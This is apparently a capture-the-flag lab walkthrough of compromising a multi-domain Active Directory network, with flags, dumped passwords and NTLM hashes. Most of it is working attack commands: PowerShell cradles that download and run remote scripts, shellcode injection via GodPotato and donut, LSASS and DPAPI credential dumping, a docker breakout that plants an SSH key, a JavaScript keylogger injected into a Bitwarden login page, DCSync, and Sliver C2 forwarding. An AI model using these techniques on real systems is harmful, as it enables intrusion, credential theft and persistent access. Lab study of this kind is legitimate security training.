Malleum Knowledge Base

Wutai in Order

12 min read

Detailed Findings

Recon External

The external IP range is

172.16.20.0/24

After scanning the whole network we found two reachable host in this IP range.

Machine NameIP
172.16.20.50
172.16.20.100
172.16.20.50

172.16.20.100

We found a list of users from work.junon.vl on the paste bin.

We first create a password list which we can use to brute force the found users.

 generate_passwords.py

Password List Generated

172.16.20.50

 sudo nmap -sC -sV -T4 -p- -oA 172.16.20.50 172.16.20.50 -vvv
PortServiceVersion
22sshOpenSSH 8.9p1 Ubuntu 3ubuntu0.1
8080http-proxySquid http proxy 5.2
  • Runs squids proxy on port 8080.
  • We can try connecting to this proxy and see if we can access the internal network if the configuration allows us.

proxychains config

 proxychains -f /etc/proxychains4.conf cme smb 172.16.20.0/24 2>/dev/null
proxychains -f /etc/proxychains4.conf cme ssh 172.16.20.0/24 2>/dev/null

The Internal IP of the external machines

 proxychains -f /etc/proxychains4.conf cme smb 172.16.21.0/24 2>/dev/null

New Machines found smb

proxychains -f /etc/proxychains4.conf cme ssh 172.16.21.0/24 2>/dev/null

Ne machines found ssh

 proxychains -f /etc/proxychains4.conf cme smb 172.16.19.0/24 2>/dev/null

User:Password

After Brute Forcing we found following valid users.

UsenamePassword
Wendy.VincentSummer2023
Hazel.SimpsonSummer2023
Terry.LoweSummer2023
Melanie.MuellerSummer2023
Wendy.VincentSummer2023
Jade.WatsonWinter2022
Hollie.ParkerWinter2022
Sarah.AllenWutai2023
Tom.PerkingsWutai2023
Roger.BallJunon2023

172.16.20.100

sudo nmap -sC -sV -T4 -p- -oA 172.16.20.100 172.16.20.100 -vvv
PortServiceVersion
22sshOpenSSH 8.9p1 Ubuntu 3ubuntu0.6
443ssl/httpnginx

  • Running Kasm on the port 443 which allows us to connected to virtual desktop if we know the valid user names and password.

  • So I used the creds of Roger.Ball to access the kasm virtual desktop.

  • It gave as the initial foothold on the S020M010

Work.Junon.VL

172.16.21.180 (S021M010)

172.16.20.100

  • Domain - work.junon.vl
  • smb signing is set to false

Initial Access

Got RDP access to the machine after logging in on 172.16.20.100

iwr http://10.8.0.154/amsi64.txt | IEX

User.txt

Flag1.txt
VL{f8ac47197978c087b4b882e84fbdc328} ### Flag1.txt ### Submitted

Privilege Escalation

We were able to write in inetpub so we could uplaod a aspx file there then Use SEImpersonate.

upload test.aspx

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"

upload sharp.ps1

./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'

execute notepad.exe

ps -e notepad

execute-shellcode -p 3604 /tmp/payload.bin

ps

root.txt

Flag2.txt
VL{3ee23591eab673b8769fe3b1a75b858a} flag2.txt Submitted

Post Exploitation / Host Recon

Credential Theft
nanodump 684 test 1 PMDM

download test

python3 -m pypykatz lsa minidump test
Loot
Username: S021M010$

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8d7070b48346d843e63616b99f048929
(Got is form Reg save later)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:748b542e4b5450664592e7d256edc4b5:::
GetST for Administraor.work.junon.vl (Just for learining)
proxychains -f /etc/proxychains4.conf getST.py -self -impersonate "Administrator" -altservice "cifs/S021M010.work.junon.vl" -dc-ip 172.16.21.10 work.junon.vl/'s021m010$' -hashes aad3b435b51404eeaad3b435b51404ee:8d7070b48346d843e63616b99f048929

172.16.21.195 (S021M015)

  • Domain - work.junon.vl
  • smb signing is set to false
PORT     STATE SERVICE       REASON
80/tcp   open  http          syn-ack
111/tcp  open  rpcbind       syn-ack
135/tcp  open  msrpc         syn-ack
139/tcp  open  netbios-ssn   syn-ack
443/tcp  open  https         syn-ack
445/tcp  open  microsoft-ds  syn-ack
2049/tcp open  nfs           syn-ack
3389/tcp open  ms-wbt-server syn-ack
8080/tcp open  http-proxy    syn-ack
8083/tcp open  us-srv        syn-ack
8383/tcp open  m2mservices   syn-ack
8443/tcp open  https-alt     syn-ack
  • We had share access for this also from the 172.16.21.180

SMB Share Recon

Found config.xml

<?xml version="1.0"?>

-<securepass>

<username>svc_me</username>

<password>SP81274145f4a5857b839ee7b500f1d66e8a044d12211781b515e7bae67bb7abce</password>

</securepass>
  • flag in amy.ball home

flag.txt amy.ball

Flag3.txt
VL{3387261d92644002942061cfea267da2} flag3.txt submitted
  • Found SecurePass.exe in install$ share
  • Reverse Engineered Password

Decrypt the Secure pass file

  • Watch the video part 3.
  • 8623050922ab890bbd2f79886cd6809f (key)
  • 81274145f4a5857b839ee7b500f1d66e (IV)
  • 8a044d12211781b515e7bae67bb7abce (pass)

AES Decrypt

Manage Engine password found

Passowrd for svc_me or admin for manage engine
  • Password = jYEp9bq32KFLVL!
  • Username = svc_me
jYEp9bq32KFLVL!

Now we need to find a machine that runs manage engine.

Manage Engine running on Port 8383

Mange Engine

  • login with admin creds with OTP from KeePassXC

172.16.21.140 (S021W105)

Privilege Escalation After getting Domain Admin

proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.195 -u 'dom-fstewart' -H 5ae361557a6f5577862eeb6443629cc1 -d work.junon.vl -X 'iwr http://10.8.0.154/amsi64.txt  -usebasicparsing | IEX' 2> /dev/null

Admin shell on S021M015

Flag7.txt
VL{a5cc8d5a387f5124a60df946ccd27052}  #### Flag7.txt submitted

Eu.Junon.VL

172.16.21.140 (S021W105)

  • Domain - work.junon.vl
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WORK-JUNON
|   NetBIOS_Domain_Name: WORK-JUNON
|   NetBIOS_Computer_Name: S021W105
|   DNS_Domain_Name: work.junon.vl
|   DNS_Computer_Name: S021W105.work.junon.vl
|   DNS_Tree_Name: work.junon.vl
|   Product_Version: 10.0.19041
|_  System_Time: 2024-07-24T09:15:38+00:00
| ssl-cert: Subject: commonName=S021W105.work.junon.vl
| Not valid before: 2024-02-27T11:03:30
|_Not valid after:  2024-08-28T11:03:30
|_ssl-date: 2024-07-24T09:15:42+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Initial Foothold as SYSTEM

  • we open the powershell or command Prompt
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
  • Ran the above command as system and carly.adams

Flag4.txt
VL{19a947c8712201ea96c9b5666c721094} ### Flag4.txt ### Submitted

Host Recon

Nanodump Lsass
nanodump 684 test 1 PMDM

download test

python3 -m pypykatz lsa minidump test
Sharpdpai
sharpdpapi machinetriage /showall


    UserName         : WORK-JUNON\carly.adams
    Credential       : ZMskoMXML_qC17
Sharpchrome
carly.adams@junon.vl,c4rlyr0cks!!
Xfreerdp login
 proxychains -f /etc/proxychains4.conf xfreerdp /u:Carly.Adams /p:ZMskoMXML_qC17 /v:172.16.21.140
  • Edge browser
  • Found Bitwarden Login to s021v010
  • Also Found mRemoteNG login to Bitwarden machine 172.16.21.140
  • Initial Foolthold

172.16.21.240 (s021v010)

Used Carly.Adams SharpChrome creds to login into bitwarden

Found a root password for esxi machine

 root 7d3XHR8uTgg2aB

Initial Foolthold

  • On the machine S021W105 we found ssh login to this machine
  • Xfreerdp login

mRemoteNG Login on S021W105

ip a output

  • We still don’t have the root password for the user bitwarden but atleast we have access to the machine.
  • The user bitwarden is in the docker group.

User bitwarden is in docker group

  • I created new external tool in mRemoteNG 

b1Ttw4rd3n!

SSH access

proxychains -f /etc/proxychains4.conf ssh bitwarden@172.16.21.140


b1Ttw4rd3n!
  • To get access to to the root i followed following

Privilege Escalation

On local machine
docker pull alpine

docker save alpine -o alpine.tar

sudo chmod 666 alpine.tar

proxychains -f /etc/proxychains4.conf scp alpine.tar bitwarden@172.16.21.240:/home/bitwarden
On Bitwarden machine
docker load -i alpine.tar

 docker run -v /:/mnt --rm -it alpine chroot /mnt sh

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCNBxzCasXVKVHNeZDHCEzRccge48z7p0ftNrHcQy4xcTG9CzD8MGLq+rBLVdTE5PiyyxPVrIgVPxs+N36erXXsTJXgK2xPcJA/QJkGJ1C/BEN6/WAb41NXlOTl+voaFMb0ecMrOpY+7SgB/AAbR3u6pgpAq+CymSi9nr/kMH6ItZ2b8Dxt+mS+1ah30YXjlOkwkotm8Q1SzO2zXd8QnU7kbucxKIB8KBSO0Ivu/wX44o4tmTiN+8DkTq6M75X//WJ49vFDyMZq3FZ9K6OtPnuJ8WJ+8JQhOIeOIT7d796Vtp4qBy1j+YqNSH/RX3OzgHrk7N8/D91eTTGWu539q0cNZ55nxPIzm2D3TqA5OKe5xobY8Z1jDAy/48ag3f0ThQUUaJmrf4E51Ez6FuaNaTioZ8VE8YEbEud8cRuOK8DCrDpk+MvC/Kf11All8IR5hTUzeqQEIR4QkKaLcF72Qq5IFCfrAAPYl1TmmpOx1Oo7RsZ8aIfq96gdxPVzt8cMWseOV7UuZYo7193gCkPeLCquJXA4Sq/RSgSHTV8Wvf17l/l4Vh6elLyX3E1sdMMpNZliM3t8G6yPpf2cVwK39Rc890he36NPmrzS4sEho7qz6LP9w1NHF8yhYtH10Vvmv+zQla8GLrX32cIt2FGCCXuMi7FP115jPqByqYStA+q/eQ== jay@hacksafely" >> /root/.ssh/authorized_keys

proxychains -f /etc/proxychains4.conf ssh root@172.16.21.240

root shell

Flag5.txt
VL{4ef82613f8d4296ab4bee1a8c48015ab} ### Flag5.txt ### Submitted

Post exploitation

  • Now we have bitwarden running on the docker.
  • We access the nginx using
docker ps

docker exec -it bitwarden-web /bin/bash

echo 'var keys = "";
var url = "bitwarden-info.gif?c=";

document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}

window.setInterval(function() {
    if(keys.length > 0) {
        new Image().src = url + keys;
        keys = "";
    }
}, 5000);' > /app/log.js


sed -i 's|</body>|<script src="log.js"></script></body>|' /app/index.html


docker exec -it bitwarden-nginx /bin/bash

tail -f /var/log/nginx/access.log | grep bitwarden

access log

fiona.stewart@junon.vl 

Junon2023!Bitwarden
  • We now login to to bit warden using this password.

hd-fstewart

DEQ8mC2xxTzVNB

172.16.21.10 (S021M005)

  • Domain - work.junon.vl
  • Most likely domain controller as signing is set to true

Recon for path

User HD-FStewart

 proxychains -f /etc/proxychains4.conf net rpc group addmem "SERVERADMINS" "hd-fstewart" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"


 proxychains -f /etc/proxychains4.conf net rpc group members "SERVERADMINS" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"

For some reason we are not admin to Domain controller but admin to

  • S021M015 (172.16.21.195)
  • S021W105 (172.16.21.140)
  • S021M010 (172.16.21.180)

SO we try another path now.

 proxychains -f /etc/proxychains4.conf net rpc group addmem "PASSWORD-AUDIT" "hd-fstewart" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"

 proxychains -f /etc/proxychains4.conf net rpc group members "PASSWORD-AUDIT" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"

DCSYNC

proxychains -f /etc/proxychains4.conf secretsdump.py 'work.junon.vl/hd-fstewart:DEQ8mC2xxTzVNB@S021M005.work.junon.vl'


Administrator:500:aad3b435b51404eeaad3b435b51404ee:b976dde1bcbbf31cbdab60d2a5a5449d:::


work.junon.vl\dom-fstewart:1416:aad3b435b51404eeaad3b435b51404ee:5ae361557a6f5577862eeb6443629cc1:::

proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.3-240 -u 'dom-fstewart' -H 5ae361557a6f5577862eeb6443629cc1 -d work.junon.vl 2> /dev/null

Foothold as Domain Admin

proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.10 -u 'dom-fstewart' -H 5ae361557a6f5577862eeb6443629cc1 -d work.junon.vl -X 'iwr http://10.8.0.154/amsi64.txt | IEX' 2> /dev/null

Domain Admin on S021M005

Flag6.txt
VL{732b25b7b505574e9098fba3a29d5c27} ### Flag6.txt submitted

172.16.21.195 (S021M015)

execute-assembly -i -s SharpHound.exe -c all,gpolocalgroup -d eu.junon.vl
Generate user list for both the domain as both domain trust each other
sharpview -t 500 -- Get-DomainUser -Domain work.junon.vl -Properties samaccountname


sharpview -t 500 -- Get-DomainUser -Domain eu.junon.vl -Properties samaccountname


cat users_eu_domain.txt | awk -F: '{print $2}' | awk 'NF' > eu_work.txt


grep -F -f users_work.txt users_eu.txt


work.junon.vl\Garry.Smith:1158:aad3b435b51404eeaad3b435b51404ee:4ed87458bfd1166a398ebad53d6935fe:::


work.junon.vl\sa-kmorris:1417:aad3b435b51404eeaad3b435b51404ee:4fd64fa379181761b526f77ce577b5ac:::
  • above users actually didn’t work so I watched the video and saw that the user sa-dwest in eu.junon.vl could be Dale west.
work.junon.vl\Dale.West:1405:aad3b435b51404eeaad3b435b51404ee:fa277a017b90f30048992530d3f9b75f:::


sa-dwest in eu domain

Eu.Junon.VL

Privilege Escalation After getting Domain Admin

172.16.21.223 (S021M215)

 proxychains -f /etc/proxychains4.conf nxc winrm 172.16.21.223 -u 'sa-dwest' -H fa277a017b90f30048992530d3f9b75f -d eu.junon.vl 2> /dev/null

Admin on the Machine

proxychains -f /etc/proxychains4.conf evil-winrm -i 172.16.21.223 -u 'sa-dwest' -H fa277a017b90f30048992530d3f9b75f

Shell

Flag8.txt
VL{591eca30daceb53f980e6f25314ad7c3} #### Flag8.txt submitted

Post Exploitation

sharpdpapi machinetriage /all



b4ckup5821!

172.16.21.222 (S021M200)

sliver (LONELY_RADISH) > rportfwd add -b 4443 -r 10.8.0.154:4443

[*] Reverse port forwarding 10.8.0.154:4443 :4443

sliver (LONELY_RADISH) > execute agent.exe -connect 127.0.0.1:4443 —ignore-cert

[*] Command executed successfully

sliver (LONELY_RADISH) > rportfwd

ID Remote Address Bind Address == ============= ============ 1 10.8.0.154:4443 :4443

 python3 pywhisker.py -d "eu.junon.vl" -u "svc_backup" -p 'b4ckup5821!' --target "S021M200$" --action "add" -e pfx



certipy cert -pfx 0K8kr8cI.pfx -password gJ7EC4NKgWDJ39QMw6fT -export -out svc_cabackup_eu_junon_vl.pfx


certipy auth -pfx svc_cabackup_eu_junon_vl.pfx -dc-ip 172.16.21.222 -username S021M200 -domain eu.junon.vl



Got hash for 's021m200@eu.junon.vl': aad3b435b51404eeaad3b435b51404ee:37a90d3373272e4682082b33b80a35cd


[*] Saved credential cache to 's021m200.ccache'

export KRB5CCNAME=s021m200.ccache


getST.py -self -impersonate "Administrator" -altservice "cifs/S021M200.eu.junon.vl" -k -no-pass -dc-ip 172.16.21.222 eu.junon.vl/'S021m200$' -hashes aad3b435b51404eeaad3b435b51404ee:37a90d3373272e4682082b33b80a35cd


secretsdump.py -k S021M200.eu.junon.vl


 proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.222 -u 'Administrator' --use-kcache -X "(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX" 2> /dev/null

Admin shell in eu domain controller

Flag9.txt
VL{388912a5b7433a36fe332c3f17cf85c6} ### FLag9 submitted


junon.vl\Bruce.Gardner:1104:aad3b435b51404eeaad3b435b51404ee:38afa1bf5ca01303d7379d873e435aa0:::


eu.junon.vl\svc_backup:1305:aad3b435b51404eeaad3b435b51404ee:78265cfb10b386484a94d4fda32a539f:::
eu.junon.vl\sa-kmorris:1307:aad3b435b51404eeaad3b435b51404ee:5d4d1612f20614cb49ffdf0c6f7377f7:::
eu.junon.vl\sa-kyoung:1308:aad3b435b51404eeaad3b435b51404ee:5a3150b71e40718688d7e32e16574f33:::
eu.junon.vl\dom-aclark:1309:aad3b435b51404eeaad3b435b51404ee:31e0f67f545a29cffa191a6bce3f2532:::
eu.junon.vl\dom-alee:1310:aad3b435b51404eeaad3b435b51404ee:4a7cc0d969a9b464b18d5dcd1f5f8016:::
eu.junon.vl\sa-dwest:1313:aad3b435b51404eeaad3b435b51404ee:fa277a017b90f30048992530d3f9b75f:::
eu.junon.vl\svc_adm:1603:aad3b435b51404eeaad3b435b51404ee:ce47782e6422a14f92900d7fe2229852:::


 proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.222 -u 'dom-aclark' -H 31e0f67f545a29cffa191a6bce3f2532  -X "(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX" 2> /dev/null

APPENDIX

Resource Development for Sliver C2

  • Created sph.exe
  • created sliverphollow64.txt

Getting Shells

cme smb 172.16.225.194 -u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://10.8.0.154/sliver64.hta"
(New-Object System.Net.WebClient).DownloadString(http://10.8.0.154/amsi64.txt) | IEX

iwr http://10.8.0.154/amsi64.txt | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.8.0.154:80/amsi64.txt%27)%22

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"

Test

iex (new-object net.webclient).downloadstring("http://192.168.45.195/test3.ps1");

test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'

 [ Out ] IT.WUTAI.VL -> EU.JUNON.VL
    * 12/25/2023 8:16:41 AM - CLEAR   - 0d 6e a8 03 36 15 98 50 3e 4b 6c 70 03 9f 0b 3d ff 5b cb d1 73 14 5b 38 ef 2f a2 d0 76 f2 54 da ed 78 26 4d 8a 16 9f b4 16 54 96 ef bd 22 c9 59 ca dd 1e b0 1c 21 5a 1c 15 09 92 e7 90 5a 4c a7 e8 31 a1 ed 94 2b 28 6b 18 a7 cf b2 df 69 fa ef 5a 2d 4f 3f 3e 83 72 7f eb 95 4b 74 08 1c 14 a4 60 b1 69 47 37 66 5e af 9c e3 31 56 7e e2 99 df 29 06 a5 df b8 5a cc 7c 7e b6 cb bc 27 f5 d1 44 c2 2b 24 ed 4e 47 49 5b 36 82 28 6a 9f 5f c2 26 59 b6 04 5a 6a d0 6d ea 72 7e 0a 83 2e 3e 15 34 17 f9 d7 2e 6e bd d9 e8 60 a1 91 af ee 65 df c6 38 c8 de 2f 3b c5 af db 39 94 ca 65 23 fb 6f 31 4f 6e 98 8d 3e 3a 96 e7 6d ba 4a c9 ad f3 8a 5e 2a b3 bc 34 01 eb bc 82 38 cf 96 27 67 69 9f c5 6f b8 fc 5f 75 61 74 82 d4 5b 92 a1 06 98 1f 6d
        * aes256_hmac       3bc98d450a7f0b1db8843221f18523880016381f355e6f421c23f96f5574688a
        * aes128_hmac       46b41e1b12348c1ac1eb29e832a53523
        * rc4_hmac_nt       b208c66992d41cf959c96ad7aae4ebc7


Current domain: EU.JUNON.VL (EU-JUNON / S-1-5-21-2634976785-1424521755-791916841)


Domain: IT.WUTAI.VL (IT / S-1-5-21-313048783-3898072970-1408672677)


Domain: IT.WUTAI.VL (IT / S-1-5-21-313048783-3898072970-1408672677)
 [  In ] EU.JUNON.VL -> IT.WUTAI.VL

 [ Out ] IT.WUTAI.VL -> EU.JUNON.VL
    * 12/25/2023 8:16:41 AM - CLEAR   - 0d 6e a8 03 36 15 98 50 3e 4b 6c 70 03 9f 0b 3d ff 5b cb d1 73 14 5b 38 ef 2f a2 d0 76 f2 54 da ed 78 26 4d 8a 16 9f b4 16 54 96 ef bd 22 c9 59 ca dd 1e b0 1c 21 5a 1c 15 09 92 e7 90 5a 4c a7 e8 31 a1 ed 94 2b 28 6b 18 a7 cf b2 df 69 fa ef 5a 2d 4f 3f 3e 83 72 7f eb 95 4b 74 08 1c 14 a4 60 b1 69 47 37 66 5e af 9c e3 31 56 7e e2 99 df 29 06 a5 df b8 5a cc 7c 7e b6 cb bc 27 f5 d1 44 c2 2b 24 ed 4e 47 49 5b 36 82 28 6a 9f 5f c2 26 59 b6 04 5a 6a d0 6d ea 72 7e 0a 83 2e 3e 15 34 17 f9 d7 2e 6e bd d9 e8 60 a1 91 af ee 65 df c6 38 c8 de 2f 3b c5 af db 39 94 ca 65 23 fb 6f 31 4f 6e 98 8d 3e 3a 96 e7 6d ba 4a c9 ad f3 8a 5e 2a b3 bc 34 01 eb bc 82 38 cf 96 27 67 69 9f c5 6f b8 fc 5f 75 61 74 82 d4 5b 92 a1 06 98 1f 6d
        * aes256_hmac       3bc98d450a7f0b1db8843221f18523880016381f355e6f421c23f96f5574688a
        * aes128_hmac       46b41e1b12348c1ac1eb29e832a53523
        * rc4_hmac_nt       b208c66992d41cf959c96ad7aae4ebc7

 [ In-1] EU.JUNON.VL -> IT.WUTAI.VL

 [Out-1] IT.WUTAI.VL -> EU.JUNON.VL
    * 12/25/2023 8:16:41 AM - CLEAR   - 84 6e c4 c9 c7 21 cf 59 4d d3 57 6f 9c 09 0a 5f 5a 8e 97 46 7c f0 bd d3 15 ba 33 b1 c3 4a c2 68 f6 66 4d 83 76 5e 71 e0 dd 13 d7 83 22 73 98 be 01 7d a2 ad f4 2f b4 74 fa e7 6c 97 05 58 34 20 a3 71 34 66 9b 95 87 a3 95 37 8d 01 77 e3 77 12 28 7d 73 a4 65 19 66 6b 44 88 dc 92 3f 50 ea a5 90 1a a9 83 5c 30 40 0a 28 e7 49 f8 c9 15 95 2d 6f ea 72 73 97 41 4c 12 ab 2f 2d e6 20 bc f1 a3 a6 17 44 89 8f d1 30 79 2c 6e eb dd 18 b6 8d b7 7a 84 d7 c9 75 6e b1 fc 98 a7 ff 35 4f c8 b8 c8 a8 7f ac 3a 03 30 e6 03 28 0e 4f 4a 82 2c 9b a2 82 16 a9 bb ea 93 0d e8 59 da 14 ab 30 84 11 45 3e 5b c7 45 71 cd 98 b2 09 46 a7 a5 37 b2 37 89 f8 8d 31 c0 fd c8 cc eb ee 14 d2 63 e4 a2 2f 20 f1 db 1f c9 52 be 79 4f 48 f1 2c 11 7b 48 b1 30
        * aes256_hmac       3456a02c3acdfa2b60b4f11174ccc4de67a988da4be49de294f4c7f547d9383f
        * aes128_hmac       f6a2529269e19e0bfba4df5bd9cd1008
        * rc4_hmac_nt       07745d53d3a409fc18d625d6fc9d8723



Get-ADObject -LDAPFilter '(objectClass=trustedDomain)' | select name,objectguid

05f9321a-dd3d-4f61-85b7-94d461511fb4

lsadump::dcsync /guid:{05f9321a-dd3d-4f61-85b7-94d461511fb4}

 Get-ADUser s021M200$ -Properties DistinguishedName

Graph View